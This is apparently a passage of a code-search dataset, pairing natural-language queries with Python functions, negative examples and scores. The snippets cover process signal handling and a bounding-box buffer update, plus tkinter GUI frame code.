daemoniker.DaemonikerSignal,\n timeout : Optional[Union[float, int]] = 3,\n check_timeout_interval : float = 0.1,\n ):\n import time\n daemoniker = attempt_import('daemoniker')\n\n try:\n daemoniker.send(str(self.pid_path), daemoniker.SIGINT)\n except Exception as e:\n return False, str(e)\n if timeout is None:\n return True, f\"Successfully sent '{signal}' to daemon '{self.daemon_id}'.\"\n begin = time.time()\n while (time.time() - begin) < timeout:\n if not self.pid_path.exists():\n return True, f\"Successfully stopped daemon '{self.daemon_id}'.\"\n time.sleep(check_timeout_interval)\n return False, (\n f\"Failed to stop daemon '{self.daemon_id}' within {timeout} second\"\n + ('s' if timeout != 1 else '') + '.'\n )", "def set_signal(self):\n eprint(\"Signal caught, ending log...\")\n self.log_sig = True", "def signal_handler(signal, frame):\n\n process_id = multiprocessing.current_process().name\n if process_id == 'child':\n return\n logger = logging.getlogger('signal_handler')\n logger.info('ctrl-c received.')\n logger.info('telling pipeline to shutdown')\n global pipeline\n pipeline.shutdown()", "def siginterrupt(sig, flag): # real signature unknown; restored from __doc__\n pass", "def term_mp(sig_num, frame):\n pid = os.getpid()\n pgid = os.getpgid(os.getpid())\n logger.info(\"main proc {} exit, kill process group \"\n \"{}\".format(pid, pgid))\n os.killpg(pgid, signal.SIGKILL)", "def signal_handler(*args):\n if station:\n station.shutdown()", "def Kill(self, sig, log_level, first=False):\n self._killing.set()\n self._WaitForStartup()\n if logging.getLogger().isEnabledFor(log_level):\n # Dump debug information about the hanging process.\n logging.log(log_level, 'Killing %r (sig=%r %s)', self.pid, sig,\n signals.StrSignal(sig))\n\n if first:\n ppid = str(self.pid)\n output = self._DebugRunCommand(\n ('pgrep', '-P', ppid), debug_level=log_level, print_cmd=False,\n error_code_ok=True, capture_output=True)\n for pid in [ppid] + output.splitlines():\n self._DumpDebugPid(log_level, pid)\n\n try:\n os.kill(self.pid, sig)\n except OSError as ex:\n if ex.errno != errno.ESRCH:\n raise", "def sigtrace_handler(sig,ign):\n global SIGNALS\n print(\"received SIG%s: %s\"%(SIGNALS[sig],process_infos(\"???\")),file=sys.stderr)\n if sig == 2:\n # Python has a special handler for SIGINT that generates\n # a KeyboardInterrupt exception\n signal.signal(sig,signal.default_int_handler)\n elif sig == signal.SIGCONT:\n # When the process restarts after being stopped we re-install\n # tracing handler on Ctrl-Z and TTIN/TTOUT signals so it is\n # possible to play with job control\n signal.signal(signal.SIGTSTP,sigtrace_handler)\n signal.signal(signal.SIGTTOU,sigtrace_handler)\n signal.signal(signal.SIGTTIN,sigtrace_handler)\n else:\n # Once a signal has been received we reinstall the default\n # handler before self-resending the signal\n signal.signal(sig,signal.SIG_DFL)\n # All signal received but SIGCONT are self-resent after being received\n if sig != signal.SIGCONT:\n os.kill(os.getpid(),sig)", "def _on_event(self, event) -> None:\n self.signal.emit(event)", "def signal_handler(signum, frame):\n monitor.stop()\n sys.exit(0)", "def kill(self):\n\n self.proc.kill()", "def try_kill(pid, sig):\n try:\n os.kill(int(pid), sig)\n except OSError:\n pass", "def requeueHandler(self, signum, frame):\n args = self.args\n print('Signal received', signum, time.time(), flush=True)\n self.SIGNAL_RECEIVED = True\n\n if os.path.isfile(self.HALT_filename):\n print('Job is done, exiting', flush=True)\n exit(0)", "def signal_handler(signal_received, frame):\n\n sys.stdout.write('\\n')\n sys.exit(0)", "def handle_signal(sig, frame):\n IOLoop.instance().add_callback(IOLoop.instance().stop)", "def sigint_handler(signal, frame):\n rclpy.shutdown()\n if prev_sigint_handler is not None:\n prev_sigint_handler(signal)", "def signal_ready(self):\n self._container.kill(signal.SIGUSR1)", "def register_signal_handler(self):\n signal.signal(signal.SIGINT, self.quit_gracefully)\n signal.signal(signal.SIGTERM, self.quit_gracefully)\n return", "def shutdownSignal(signum, frame):\n LOG.warning(\"shutting down, got signal %d\", signum)\n shutdown()", "def _kill_self():\n os.kill(os.getpid(), signal.SIGKILL)", "def process_signal(self, src, tag, value):\n pass", "def signal_handler(signal, frame):\n print(chr(27) + \"[2J\")\n sys.exit(0)", "def signal(signal=None):\n no_extra_args = (\"configtest\", \"status\", \"fullstatus\")\n valid_signals = (\"start\", \"stop\", \"restart\", \"graceful\", \"graceful-stop\")\n\n if signal not in valid_signals and signal not in no_extra_args:\n return\n # Make sure you use the right arguments\n if signal in valid_signals:\n arguments = \" -k {}\".format(signal)\n else:\n arguments = \" {}\".format(signal)\n cmd = _detect_os() + arguments\n out = __salt__[\"cmd.run_all\"](cmd)\n\n # A non-zero return code means fail\n if out[\"retcode\"] and out[\"stderr\"]:\n ret = out[\"stderr\"].strip()\n # 'apachectl configtest' returns 'Syntax OK' to stderr\n elif out[\"stderr\"]:\n ret = out[\"stderr\"].strip()\n elif out[\"stdout\"]:\n ret = out[\"stdout\"].strip()\n # No output for something like: apachectl graceful\n else:\n ret = 'Command: \"{}\" completed successfully!'.format(cmd)\n return ret", "def kill(self):\n if self.transport.pid is not None:\n self.transport.signalProcess('KILL')", "def _send_kernel_sigterm(self, restart: bool = False):", "def signal_kernel(self, signum):\n pass", "def remote_kill():", "def _terminate(self):\n\n stopsignal = self.stopsignal\n\n log.info('Stop Process Requested')\n self._terminating = True\n if self._p0:\n log.info('Sending signal %s to process %s' % (stopsignal, self._p0.pid))\n kill_tree(self._p0.pid, stopsignal)\n elif self._p0 is None:\n raise errors.ChalmersError(\"This process did not start this program, can not call _terminate\")", "def trigger_signal(self, signal: str) -> None:\n logger.debug(\"Triggered Signal %s\", signal)\n for handler in self.signals[signal]:\n if not iscoroutinefunction(handler):\n handler(self, signal)", "def signal_handler(signal, frame): \n import signal\n import sys\n from time import localtime, strftime\n time = strftime(\"%H:%M:%S\", localtime())\n sel = raw_input('\\n\\n%s: Paused. Press return to resume, or type exit to quit: \\n' % time)\n if sel.startswith('e') or sel.startswith('E'):\n sys.exit(0)\n else:\n time = strftime(\"%H:%M:%S\", localtime())\n print '%s: Interrogation resumed.\\n' % time", "def kill(self, signum, frame):\n self.delete()\n os.kill(os.getpid(), signum)", "def signal_handler(signum, frame):\n self.log.error(\"Received SIGTERM. Terminating subprocesses\")\n self.task_runner.terminate()\n self.handle_task_exit(128 + signum)" ]
[ "0.83821654", "0.82537395", "0.78793293", "0.7300469", "0.7116897", "0.7112409", "0.7100441", "0.7099212", "0.68905115", "0.6861185", "0.6853869", "0.68038225", "0.67226195", "0.6577294", "0.65427446", "0.65303904", "0.6520947", "0.64594877", "0.6416063", "0.6404712", "0.6392736", "0.6364421", "0.63409144", "0.63300043", "0.63141257", "0.6277827", "0.6277251", "0.62402284", "0.62154114", "0.62071717", "0.6193959", "0.6121365", "0.611319", "0.61062926", "0.60988635", "0.60839367", "0.6076719", "0.60598505", "0.60475475", "0.6026432", "0.602507", "0.6007628", "0.59988976", "0.5996111", "0.5970812", "0.5970638", "0.59554684", "0.59505063", "0.5934748", "0.5928679", "0.5918275", "0.5911693", "0.5889584", "0.5871705", "0.58663654", "0.58578956", "0.5856859", "0.58506244", "0.5849709", "0.584507", "0.58415157", "0.58415157", "0.58415157", "0.5830738", "0.5823205", "0.5803624", "0.5803624", "0.5795123", "0.579459", "0.57847315", "0.5778715", "0.5771168", "0.5764006", "0.57623404", "0.57548654", "0.5753262", "0.57357234", "0.5733585", "0.57324994", "0.5728182", "0.57277614", "0.57259744", "0.57198834", "0.57134295", "0.57078564", "0.5704503", "0.56983376", "0.5690706", "0.56760305", "0.5664787", "0.565714", "0.5644327", "0.56311524", "0.5617244", "0.56076384", "0.55979466", "0.5582453", "0.5578827", "0.55751824", "0.5567608" ]
0.7512397
3
update self boexes with new frame's boxes
def update(self, new_boxes): if len(self.lengths) > self.n_frames: # delete oldest if exceed capacity del self.boxes[0:self.lengths[0]] del self.lengths[0] self.lengths.append(len(new_boxes)) self.boxes.extend(new_boxes)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def changement_frame(self):\n\n for widget in self.fenetre_scores.winfo_children():\n widget.pack_forget()\n\n for widget in self.fenetre_regles.winfo_children():\n widget.pack_forget()\n\n for widget in self.frame_jeu.winfo_children():\n widget.pack_forget()\n\n for widget in self.winfo_children():\n if widget != self.titre:\n widget.pack_forget()", "def Define_Frame(self):\n self.frame=Frame(self.master, relief=GROOVE, bd=4)\n self.frame.grid(row=0,column=1,rowspan=2,columnspan=2)\n frame_title = Label(self.frame,text=\"Stage Control\",relief=RAISED,bd=2,width=24, bg=\"light yellow\",font=(\"Times\", 16))\n frame_title.grid(row=0, column=1)\n self.encoder_text = [] # These hold the stage position as read by the encoders\n self.coo_ent = [] # These hold the coordinate entry values\n but = []\n encoder_display = []\n for i in range(3):\n self.coo_ent.append(Entry(self.frame, justify=\"center\", width=12))\n but.append(Button(self.frame, text=\"Move %s (relative)\"%self.POS_NAME[i], width=12,command=lambda axis=i:self.GUI_move(axis)))\n self.encoder_text.append(StringVar())\n encoder_display.append(Label(self.frame,textvariable=self.encoder_text[i],relief=SUNKEN,bd=1, width=20))\n self.coo_ent[i].grid(row=i+1,column=0)\n self.coo_ent[i].focus_set()\n but[i].grid(row=i+1,column=1)\n encoder_display[i].grid(row=i+1,column=2)\n self.encoder_text[i].set(\"%8s microns\"%str(self.read_pos[i]))\n zero_encoders_button = Button(self.frame, text=\"Re-Initialize Encoders\", width=20, command=self.GUI_ReInitialize_Encoders)\n zero_encoders_button.grid(row=5,column=1)\n return", "def setUpFrame(self):\n #adds labels to the Board\n self.mineLabel = tk.Label(self, text=\"Mines: \"+str(self.numMines))\n self.mineLabel.grid(row=0, column=0, sticky=\"W\", columnspan=int((self.cols-2)/2))\n self.smileButton = tk.Label(self, image=self.images[1])\n self.smileButton.grid(row=0, column=int((self.cols-2)/2), sticky=\"WE\", columnspan=2)\n self.flagLabel = tk.Label(self, text=\"Flags: \"+str(self.numFlags))\n self.flagLabel.grid(row=0, column=int((self.cols-2)/2)+2, sticky=\"E\", columnspan=int((self.cols-1)/2))\n\n #left click listeners on smileButton\n self.smileButton.bind('<ButtonPress-1>', lambda event, num=0: self.changeSmile(num))\n self.smileButton.bind('<ButtonRelease-1>', self.replay)", "def createFrame(self):\n \n self.outerFrame = f = Tk.Frame(self.frame)\n f.pack(expand=1,fill=\"both\")\n \n if self.label:\n labf = Tk.Frame(f)\n labf.pack(pady=2)\n lab = Tk.Label(labf,text=self.label)\n lab.pack()\n \n f2 = Tk.Frame(f)\n f2.pack(expand=1,fill=\"both\")\n \n self.box = box = Tk.Listbox(f2,height=20,width=30)\n box.pack(side=\"left\",expand=1,fill=\"both\")\n \n bar = Tk.Scrollbar(f2)\n bar.pack(side=\"left\", fill=\"y\")\n \n bar.config(command=box.yview)\n box.config(yscrollcommand=bar.set)", "def updatemaxbombs(self):\n tiles: int = int(self.widthbox.get()) * int(self.heightbox.get())\n self.bombsbox.configure(to=tiles/2)", "def _set_boxes(self, listOfBoxes):\n self._boxes = listOfBoxes", "def extra_frame(self):\n\n self.extraframe = tk.Frame(self.extra_notebook, bg='white')\n self.extraframe.pack(anchor='center', expand=True, fill='y')\n # RoHS checker\n self.rohsframe = tk.Frame(self.extraframe, bg='#7093db')\n self.rohsframe.pack(pady=10, fill='x', expand=True)\n rohs = DoubleTextButton(self.rohsframe,\n text_main='RoHS Bill of Materials Comparison',\n text_sub='Output a delta report between two BOMS',\n command=lambda: self.raiseframe_extra(ROHSCompare))\n rohs.pack(fill='x', expand=True, side='right', padx=(4, 0))\n # Format Checker\n self.filterframe = tk.Frame(self.extraframe, bg='#7093db')\n self.filterframe.pack(pady=10, fill='x', expand=True)\n filtercheck = DoubleTextButton(self.filterframe,\n text_main='Format Checker',\n text_sub='Will output filtered CCL to check CCL format',\n command=lambda: self.raiseframe_extra(FilterCompare))\n filtercheck.pack(fill='x', expand=True, side='right', padx=(4, 0))\n # Illustration tool\n self.illtoolframe = tk.Frame(self.extraframe, bg='#7093db')\n self.illtoolframe.pack(pady=10, fill='x', expand=True)\n illustration_tool = DoubleTextButton(self.illtoolframe,\n text_main='Illustration Tool',\n text_sub='Used to insert and delete illustrations',\n command=lambda: self.raiseframe_extra(InsertDelIllustration))\n illustration_tool.pack(fill='x', expand=True, side='right', padx=(4, 0))", "def fillbox(self,event=None):\n \n pass", "def build_frames(self):\n self.cntrl_frame = tk.PanedWindow(self.root)\n self.cntrl_frame.pack(side = tk.TOP, padx = 1, pady = 1, fill = tk.Y)\n self.info_frame_1 = tk.PanedWindow(self.root)\n self.info_frame_1.pack(side = tk.TOP, padx = 1, pady = 2, fill = tk.Y)", "def _bbox_updated(self):\n self.updated = True", "def updateFootprintBbox(self):\n # Pull out the image bounds of the parent Footprint\n self.bb = self.fp.getBBox()\n if not self.imbb.contains(self.bb):\n raise ValueError(('Footprint bounding-box %s extends outside image bounding-box %s') %\n (str(self.bb), str(self.imbb)))\n self.W, self.H = self.bb.getWidth(), self.bb.getHeight()\n self.x0, self.y0 = self.bb.getMinX(), self.bb.getMinY()\n self.x1, self.y1 = self.bb.getMaxX(), self.bb.getMaxY()", "def update(self):\n self.active = False\n self.top.update(self.rgb,self.cmyk,self.hsv)\n self.bot.update(self.rgb,self.cmyk,self.hsv)\n self.active = True", "def refreshActiveFrames(self, event=None):\n self.unloadAllFrames()\n self.checkFramesHaveData()\n\n try:\n self.contentFrame.currFrame.built = False\n except AttributeError:\n pass\n\n try:\n if self.contentFrame.currFrame.hasRequiredData():\n self.contentFrame.currFrame.enter()\n else:\n self.frameBtnCmds[0](self)\n except AttributeError:\n self.frameBtnCmds[0](self)", "def load(self):\n # Frame\n self.frame.grid_configure(row=1, column=1, padx=(PAD, PAD+TINY_PAD), pady=(0, PAD+CANVAS_PAD), sticky=tk.N+tk.S)\n self.frame.rowconfigure(1, weight=1)\n self.frame.rowconfigure(3, weight=1)\n # Across label\n self.across_label.config(text=\"Across\", anchor=tk.W, **settings.get(\"style:clue\"))\n self.across_label.grid(row=0, column=0, pady=(0, TINY_PAD), sticky=tk.N+tk.W)\n # Across frame\n self.across_frame.config(highlightthickness=1, highlightbackground=settings.get(\"style:border:fill\"))\n self.across_frame.grid(row=1, pady=(CANVAS_PAD, PAD), sticky=tk.N+tk.S)\n self.across_frame.rowconfigure(0, weight=1)\n # Across listbox\n self.across_listbox.config(bd=0, selectborderwidth=0, activestyle=tk.NONE, **settings.get(\"style:list\"))\n self.across_listbox.grid(row=0, column=0, sticky=tk.N+tk.S)\n self.across_listbox.config(yscrollcommand=self.across_scrollbar.set)\n # Across scrollbar\n self.across_scrollbar.config(command=self.across_listbox.yview)\n self.across_scrollbar.grid(row=0, column=1, sticky=tk.N+tk.S)\n # Down label\n self.down_label.config(text=\"Down\", anchor=tk.W, **settings.get(\"style:clue\"))\n self.down_label.grid(row=2, column=0, pady=(PAD, 0), sticky=tk.N+tk.W)\n # Down frame\n self.down_frame.config(highlightthickness=1, highlightbackground=settings.get(\"style:border:fill\"))\n self.down_frame.grid(row=3, pady=(TINY_PAD, 0), sticky=tk.N+tk.S)\n self.down_frame.rowconfigure(0, weight=1)\n # Down listbox\n self.down_listbox.config(bd=0, selectborderwidth=0, activestyle=tk.NONE, **settings.get(\"style:list\"))\n self.down_listbox.grid(row=0, column=0, sticky=tk.N+tk.S)\n self.down_listbox.config(yscrollcommand=self.down_scrollbar.set)\n # Down scrollbar\n self.down_scrollbar.config(command=self.down_listbox.yview)\n self.down_scrollbar.grid(row=0, column=1, sticky=tk.N+tk.S)", "def create_frames(self):\n self.list_frame = Frame(self.master)\n self.list_frame.grid(row=0, column=0)\n\n self.volume_frame = VolumeFrame(master=self.master, text=\"Volume\")\n self.volume_frame.grid(row=0, column=2, rowspan=2)\n\n self.btn_frame = Frame(self.master)\n self.btn_frame.grid(row=1, column=0, padx=20)\n\n self.listbox = Listbox(self.list_frame, bg='black', fg='green', selectbackground='gray', selectforeground='black', selectmode=EXTENDED, width=48)\n self.listbox.pack(fill=X, padx=20, pady=(20, 0))\n self.slider = ttk.Scale(self.list_frame, value=0, from_=0, to=100, orient=HORIZONTAL, command=self.slide)\n self.slider.pack(fill=X, padx=20)\n\n # setting images\n global img_1, img_2, img_3, img_4, img_5\n img_1 = ImageConverter.create_image(f'img/next.png', 40, 180)\n img_2 = ImageConverter.create_image(f'img/play.png', 40, 0)\n img_3 = ImageConverter.create_image(f'img/pause.png', 40, 0)\n img_4 = ImageConverter.create_image(f'img/stop.png', 40, 0)\n img_5 = ImageConverter.create_image(f'img/next.png', 40, 0)\n\n images = [{\"file\": img_1, \"command\": self.previous},\n {\"file\": img_2, \"command\": self.play},\n {\"file\": img_3, \"command\": self.pause},\n {\"file\": img_4, \"command\": self.stop},\n {\"file\": img_5, \"command\": self.next}]\n\n for index, image in enumerate(images):\n self.btn = Button(self.btn_frame, image=image[\"file\"], command=image[\"command\"], relief=FLAT)\n self.btn.grid(row=0, column=index, sticky=N+S+E+W, padx=8)\n\n self.info_frame = Frame(self.master)\n self.info_frame.grid(row=2, column=0, sticky=S)\n self.info_label = Label(self.info_frame, text=\"\", relief=SUNKEN, anchor=E, width=48)\n self.info_label.pack(fill=X)", "def update_window(self, window, frame):\n self.draw_eyes()\n self.show(window, frame)\n self.new_frame()", "def __init__(self, box):\n self.is_hidden = False\n self.last_boxes = []\n self.best_box = None\n self.frames_undetected = 0\n self.age = 0\n self.n_frames = 10\n\n self.update(box)", "def __update(self):\n for b in self.__borders:\n b.redraw()\n\n for w in self.__allWins:\n w.refresh()", "def updateBlobs(self):\n with signalsBlocked(self.param):\n # with signalsBlocked(self.param):\n inputs = self.inputs()\n self.bottoms.setValue([i.name() for i in inputs.values()], clear=True)\n outputs = self.outputs()\n self.tops.setValue([o.name() for o in outputs.values()], clear=True)\n self.updateProto()", "def _create_left_summary_frame(self):\n self.frames.append(tk.Frame(self.master))\n self.frames[6].grid(column=0, row=2, sticky=\"ew\")\n self.getall_button = (tk.Button(self.frames[6],\n text=\"All Indiv stats\"))\n self.getall_button.grid(column=0, row=0, sticky=\"nesw\")\n self.go_button = (tk.Button(self.frames[6], text=\"Team Stats\"))\n self.go_button.grid(column=1, row=0, sticky=\"nesw\")\n self.frames[6].columnconfigure(0, weight=1)\n self.frames[6].columnconfigure(1, weight=1)", "def UpdateFrame(self, sender=None, args=None):\n # Update label for sensor: s['label']\n # with the most recent measurement: s().data['data'][-1]\n for s in self.sensors:\n self.gValue[s.GetID()].SetLabel( '{num} {unit}'.format(\n num = s().data['data'][-1],\n unit = str(s['unit'])) )\n try:\n pub.sendMessage( 'Plot.%s' %self.GetLabel() )\n except:\n self.plot_deleted = True\n\n \n self.top_sizer.Layout()", "def update(self):\n left_height = self.left.height if self.left else -1\n right_height = self.right.height if self.right else -1\n self.height = 1 + max(left_height, right_height)\n self.bf = right_height - left_height", "def _initialize_widgets(self):\n self.outer_board = [[Frame(self.root, bd = self.FRAME_BORDER_WIDTH, \n relief = self.FRAME_RELIEF) \n for _ in range(self.BOARD_DIM)] \n for _ in range(self.BOARD_DIM)]\n self.inner_boards = [[self._generate_inner_board(r, c) \n for c in range(self.BOARD_DIM)]\n for r in range(self.BOARD_DIM)]", "def _refresh_screen(self):\n self.myscreen.refresh()\n self.box1.refresh()\n self.box2.refresh()", "def update_bbox(self): \r\n \r\n centX, centY = self.center\r\n\r\n brush_thickness = self.brush[0]\r\n\r\n margin = self.__size + brush_thickness + BOUNDARY_MARGIN\r\n\r\n self.bbox = [int(centX - margin), int(centY - margin),\r\n int(centX + margin), int(centY + margin)]", "def update_(self):\n self.update_listbox()\n self.update_infobox()\n self.update_statusbar()\n self.listbox.select_set(0)\n self.listbox.focus_set()", "def main():\n global fenetre, gr_grid,grid, chaine, var1, var2\n fenetre = Frame()\n \n fenetre.grid()\n fenetre.master.title('2048')\n var1= StringVar()\n var2= StringVar()\n Checkbutton(fenetre, text=\"Entier\", width= 11, variable= var1, onvalue='oui', offvalue='non').grid(row=1, sticky=E)\n Checkbutton(fenetre, text=\"Chimie\", width= 10, variable= var2, onvalue='oui', offvalue='non').grid(row=1, sticky=W)\n \n but1=Button(fenetre, text='Load', width= 11, command=grid_load1)\n but1.grid(row= 2, sticky= W)\n but2=Button(fenetre, text='Save', width= 11, command=grid_save1)\n but2.grid(row=2, sticky= E)\n fenetre.master.bind(\"<Key>\", key_pressed)\n background = Frame(fenetre, bg = GAME_BG,\n width=GAME_SIZE, height=GAME_SIZE)\n background.grid()\n chaine= Label(fenetre)\n chaine.grid()\n gr_grid = []\n for i in range(4):\n gr_line = []\n for j in range(4):\n cell = Frame(background, bg = TILE_EMPTY_BG,\n width = TILES_SIZE, height = TILES_SIZE)\n cell.grid(row=i, column=j,padx=1, pady=1)\n t = Label(master = cell, text = \"\", bg = TILE_EMPTY_BG,\n justify = CENTER, font = TILES_FONT,\n width=4, height=2)\n t.grid()\n gr_line.append(t)\n gr_grid.append(gr_line)\n grid = grid_init()\n grid_display(grid)\n fenetre.mainloop()", "def createFrame(self):\n \n tkinterListBoxDialog.createFrame(self)\n self.addFrameButtons()", "def refresh(self):\n\t\tself.win.refresh()\n\t\tfor c in self.components:\n\t\t\tc.refresh()", "def create_status_robot_frame(self):\n\n self.Robot_Status_Frame = tk.Frame(master=self)\n self.Robot_Status_Frame.config(highlightthickness=1, highlightcolor=\"black\", highlightbackground=\"black\")\n self.Robot_Status_Frame.pack(side = tk.LEFT, padx = 20, pady = 10, fill = tk.BOTH)\n\n status_lbl = tk.Label(master = self.Robot_Status_Frame, text = \"ROBOT STATUS\", width = 15)\n status_lbl.pack(side = tk.TOP) \n\n self.lbl_pose_x = tk.StringVar()\n self.lbl_pose_y = tk.StringVar()\n self.lbl_angle = tk.StringVar()\n self.lbl_status = tk.StringVar()\n self.lbl_goto_x = tk.StringVar()\n self.lbl_goto_y = tk.StringVar()\n\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"X: \", label_target = self.lbl_pose_x)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"Y: \", label_target = self.lbl_pose_y)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"Angle: \", label_target = self.lbl_angle)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"Status: \", label_target = self.lbl_status)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"\", label_target = None)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"next GOTO X: \", label_target = self.lbl_goto_x)\n GUI_MAP.create_label_frame(master = self.Robot_Status_Frame, label_text = \"next GOTO Y: \", label_target = self.lbl_goto_y)\n\n\n self.lbl_pose_x.set(\"N/A\")\n self.lbl_pose_y.set(\"N/A\")\n self.lbl_angle.set(\"N/A\")\n self.lbl_status.set(\"N/A\")\n self.lbl_goto_x.set(\"N/A\")\n self.lbl_goto_y.set(\"N/A\")", "def onFrameUpdated(self):\n pass", "def build_frames(dialbox):\n #Buttons Frame\n dialbox.button_frame = tk.Frame(dialbox.master_frame)\n dialbox.button_frame.grid(row=3, column=1)\n #Output Frame\n dialbox.output_frame = tk.Frame(dialbox.master_frame)\n dialbox.output_frame.grid(row=4, column=0, columnspan=2)", "def updateButtons(self):\n self.cboxes = [] # List of check boxes\n self.tboxes = [] # Corresponding list of text boxes\n for r in range(self.nclasses):\n c = 0\n # print('**', self.clusters[r])\n tbox = QLineEdit(self.clusters[r])\n tbox.setMinimumWidth(80)\n tbox.setMaximumHeight(150)\n tbox.setStyleSheet(\"border: none;\")\n tbox.setAlignment(Qt.AlignCenter)\n tbox.textChanged.connect(self.updateClusterNames)\n self.tboxes.append(tbox)\n self.flowLayout.addWidget(self.tboxes[-1], r, c)\n c += 1\n cbox = QCheckBox(\"\")\n cbox.clicked.connect(self.selectAll)\n self.cboxes.append(cbox)\n self.flowLayout.addWidget(self.cboxes[-1], r, c)\n c += 1\n # Find the segments under this class and show them\n for segix in range(len(self.segments)):\n if self.segments[segix][-1] == r:\n self.flowLayout.addWidget(self.picbuttons[segix], r, c)\n c += 1\n self.picbuttons[segix].show()\n self.flowLayout.adjustSize()\n self.flowLayout.update()\n self.setColourLevels()", "def update(self):\n self.rect = (self.x, self.y, self.width, self.height)", "def build_boxes(self):\n for index in self.box_space.points:\n if self.rank_of_box[index] == self.my_rank:\n self.my_boxes.append(Box(self, index))", "def update_selection(self):\n\n # clear all boxes\n self.clear_boxes()\n self.draw_figure(self.s)\n\n # update temperature list\n if self.Data[self.s]['T_or_MW'] == \"T\":\n self.temperatures = np.array(self.Data[self.s]['t_Arai']) - 273.\n else:\n self.temperatures = np.array(self.Data[self.s]['t_Arai'])\n\n self.T_list = [\"%.0f\" % T for T in self.temperatures]\n self.tmin_box.SetItems(self.T_list)\n self.tmax_box.SetItems(self.T_list)\n self.tmin_box.SetValue(\"\")\n self.tmax_box.SetValue(\"\")\n self.Blab_window.SetValue(\n \"%.0f\" % (float(self.Data[self.s]['pars']['lab_dc_field']) * 1e6))\n if \"saved\" in self.Data[self.s]['pars']:\n self.pars = self.Data[self.s]['pars']\n self.update_GUI_with_new_interpretation()\n self.Add_text(self.s)\n self.write_sample_box()", "def addFrameButtons (self):\n \n self.buttonFrame = f = Tk.Frame(self.outerFrame)\n f.pack()\n \n row1 = Tk.Frame(f)\n row1.pack()\n \n # Create the back and forward buttons, cloning the images & commands of the already existing buttons.\n image = self.lt_nav_iconFrame_button.cget(\"image\")\n command = self.lt_nav_iconFrame_button.cget(\"command\")\n \n self.lt_nav_button = b = Tk.Button(row1,image=image,command=command)\n b.pack(side=\"left\",pady=2,padx=5)\n \n image = self.rt_nav_iconFrame_button.cget(\"image\")\n command = self.rt_nav_iconFrame_button.cget(\"command\")\n \n self.rt_nav_button = b = Tk.Button(row1,image=image,command=command)\n b.pack(side=\"left\",pady=2,padx=5)\n \n row2 = Tk.Frame(f)\n row2.pack()\n self.addStdButtons(row2)\n \n row3 = Tk.Frame(f)\n row3.pack()\n \n self.clear_button = b = Tk.Button(row3,text=\"Clear All\",\n width=6,command=self.clearAll)\n b.pack(side=\"left\",pady=2,padx=5)\n \n self.delete_button = b = Tk.Button(row3,text=\"Delete\",\n width=6,command=self.deleteEntry)\n b.pack(side=\"left\",pady=2,padx=5)", "def updateBox(self):\n for k in vars(self.ml_classifier_cls):\n if (not k.startswith('__')) and k != 'status' and k != 'model':\n value = getattr(self.ml_classifier_cls, k)\n self.parameters[k] = value\n\n rows = [widgets.HTML(value='<h3>Configure your backend machine learning model</h3>'\n '<p>If you are not sure what the parameters are, just leave them as they are.</p>'\n '<p>There are <b>' + str(\n self.leftover) + '</b> samples left unreviewed. The ML model will retrain at a pace '\n 'of once per <b>' + str(self.learning_pace) + '</b> samples.')]\n for name, value in self.parameters.items():\n if type(value) == int:\n self.parameter_inputs[name] = widgets.BoundedIntText(description=name, value=value, min=-1)\n rows.append(self.parameter_inputs[name])\n elif type(value) == float:\n self.parameter_inputs[name] = widgets.BoundedFloatText(description=name, value=value)\n rows.append(self.parameter_inputs[name])\n elif type(value) == str:\n self.parameter_inputs[name] = widgets.Text(description=name, value=value)\n rows.append(self.parameter_inputs[name])\n\n rows += self.addSeparator(top='10px') + self.addSeparator(\n top='10px') + [self.addPreviousNext(self.show_previous, self.show_next)]\n self.box = widgets.VBox(rows)\n pass", "def _configure_canvas(event):\n if self.internal_frame.winfo_reqwidth() != self.canvas.winfo_width():\n## print \"frame\",self.internal_frame.winfo_reqwidth()\n## print \"canvas\",self.canvas.winfo_width()\n # update the inner frame's width to fill the canvas\n## self.canvas.itemconfigure(interior_id, width=self.canvas.winfo_width())\n self.canvas.config(width=self.internal_frame.winfo_reqwidth())\n if self.internal_frame.winfo_reqheight() != self.canvas.winfo_height():\n # update the inner frame's width to fill the canvas\n## self.canvas.itemconfigure(interior_id, width=self.canvas.winfo_width())\n self.canvas.config(height=self.internal_frame.winfo_reqheight())", "def change_frame(self, frame):\r\n pass", "def _refresh_render(self):\n current_frame = self.frame\n self.frame = int(1E6)\n self.frame = current_frame", "def loop(self, frame):\n self.root = frame\n self.drawUI()\n cv2.imshow('Fotopasca', self.root)", "def display_widgets(self):\n self.f_left.pack(side=tk.LEFT, padx=20)\n self.f_mid.pack(side=tk.LEFT)\n self.f_right.pack(side=tk.LEFT, padx=10)\n self.f_right_up.pack(side=tk.TOP)\n self.f_right_down.pack(side=tk.TOP)\n\n self.f_y0.pack(side=tk.TOP)\n self.l_y0.pack(side=tk.LEFT)\n self.e_y0.pack(side=tk.LEFT, padx=10)\n\n self.f_x0.pack(side=tk.TOP)\n self.l_x0.pack(side=tk.LEFT)\n self.e_x0.pack(side=tk.LEFT, padx=10)\n\n self.f_X.pack(side=tk.TOP)\n self.l_X.pack(side=tk.LEFT)\n self.e_X.pack(side=tk.LEFT, padx=10)\n\n self.f_N.pack(side=tk.TOP)\n self.l_N.pack(side=tk.LEFT)\n self.e_N.pack(side=tk.LEFT, padx=10)\n\n self.f_solve.pack(side=tk.TOP, pady=20)\n self.b_solve.pack(side=tk.TOP, fill=tk.BOTH, pady=5)\n\n self.f_Ni.pack(side=tk.TOP)\n self.l_Ni.pack(side=tk.LEFT)\n self.e_Ni.pack(side=tk.LEFT, padx=10)\n\n self.f_Nf.pack(side=tk.TOP)\n self.l_Nf.pack(side=tk.LEFT)\n self.e_Nf.pack(side=tk.LEFT, padx=9)\n\n self.f_glob_er.pack(side=tk.TOP, pady=20)\n self.b_glob_er.pack(side=tk.TOP, fill=tk.BOTH, pady=5)", "def buildmainframe(self):\n self.mainframewidgets=[]\n for x in range(3):\n thislabel = Label(self.mainframe, text=str(x))\n thislabel.grid()\n self.mainframewidgets.append(thislabel)", "def refresh_display(self):\n for widget in self.button_frame.children.values():\n widget.grid_forget() \n\n for (i, rd) in enumerate(self.row_detail_list):\n 